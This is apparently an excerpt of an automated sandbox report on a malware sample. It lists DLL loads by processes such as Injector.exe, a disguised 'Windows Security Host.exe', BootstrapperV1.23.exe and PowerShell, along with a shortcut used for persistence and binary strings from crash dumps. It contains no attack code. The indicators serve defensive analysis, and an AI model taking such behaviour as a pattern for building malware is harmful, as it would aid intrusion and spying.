                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: linkinfo.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: ntshrui.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: cscapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: avicap32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: msvfw32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\ipconfig.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\ipconfig.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\ipconfig.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\Windows Security Host.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\Windows Security Host.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\Windows Security Host.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\Windows Security Host.exeSection loaded: version.dll
                    Source: C:\Users\user\Windows Security Host.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\Windows Security Host.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\Windows Security Host.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\Windows Security Host.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\Windows Security Host.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\Windows Security Host.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\Windows Security Host.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\Windows Security Host.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\Windows Security Host.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\Windows Security Host.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\Windows Security Host.exeSection loaded: version.dll
                    Source: C:\Users\user\Windows Security Host.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\Windows Security Host.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\Windows Security Host.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\Windows Security Host.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\Windows Security Host.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\Windows Security Host.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\Windows Security Host.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\Windows Security Host.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                    Source: Windows Security Host.lnk.3.drLNK file: ..\..\..\..\..\..\..\Windows Security Host.exe
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: 8Hd0ZExgJz.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: 8Hd0ZExgJz.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: System.Runtime.Serialization.ni.pdb source: WERAD5E.tmp.dmp.23.dr
                    Source: Binary string: System.Data.pdb source: WERAD5E.tmp.dmp.23.dr
                    Source: Binary string: m.pdbE source: BootstrapperV1.23.exe, 00000004.00000002.1620001182.000001EFAF449000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Xml.ni.pdb source: WERAD5E.tmp.dmp.23.dr
                    Source: Binary string: System.Runtime.Serialization.ni.pdbRSDSg@h source: WERAD5E.tmp.dmp.23.dr
                    Source: Binary string: System.ni.pdbRSDS source: WERAD5E.tmp.dmp.23.dr
                    Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96E0C000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Windows.Forms.ni.pdb source: WERAD5E.tmp.dmp.23.dr
                    Source: Binary string: System.Drawing.ni.pdb source: WERAD5E.tmp.dmp.23.dr
                    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbdllG source: BootstrapperV1.23.exe, 00000004.00000002.1620001182.000001EFAF3B0000.00000004.00000020.00020000.00000000.sdmp
